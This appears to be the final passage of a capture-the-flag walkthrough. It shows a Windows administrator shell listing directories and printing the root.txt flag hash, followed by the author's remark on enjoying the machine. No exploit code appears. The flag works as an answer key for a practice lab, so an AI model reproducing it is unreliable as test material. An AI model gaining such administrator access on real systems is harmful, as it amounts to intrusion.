 Directory of C:\Users\Administrator

07/09/2021  06:50 AM    <DIR>          .
07/09/2021  06:50 AM    <DIR>          ..
02/19/2020  04:03 PM    <DIR>          3D Objects
02/19/2020  04:03 PM    <DIR>          Contacts
02/20/2020  03:41 AM    <DIR>          Desktop
02/19/2020  05:26 PM    <DIR>          Documents
02/23/2020  02:22 PM    <DIR>          Downloads
02/19/2020  04:03 PM    <DIR>          Favorites
02/19/2020  04:03 PM    <DIR>          Links
02/19/2020  04:03 PM    <DIR>          Music
02/19/2020  04:03 PM    <DIR>          Pictures
02/19/2020  04:03 PM    <DIR>          Saved Games
02/20/2020  01:45 AM    <DIR>          Searches
02/19/2020  04:03 PM    <DIR>          Videos
               0 File(s)              0 bytes
              14 Dir(s)  13,410,852,864 bytes free

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is D582-9880

 Directory of C:\Users\Administrator\Desktop

02/20/2020  03:41 AM    <DIR>          .
02/20/2020  03:41 AM    <DIR>          ..
10/06/2021  08:11 PM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)  13,410,656,256 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
6d2275070481c4ed17c8dc4ede319c6e

C:\Users\Administrator\Desktop>  

One of the most enjoyable machines I have solved recently!

Category: Walkthrough
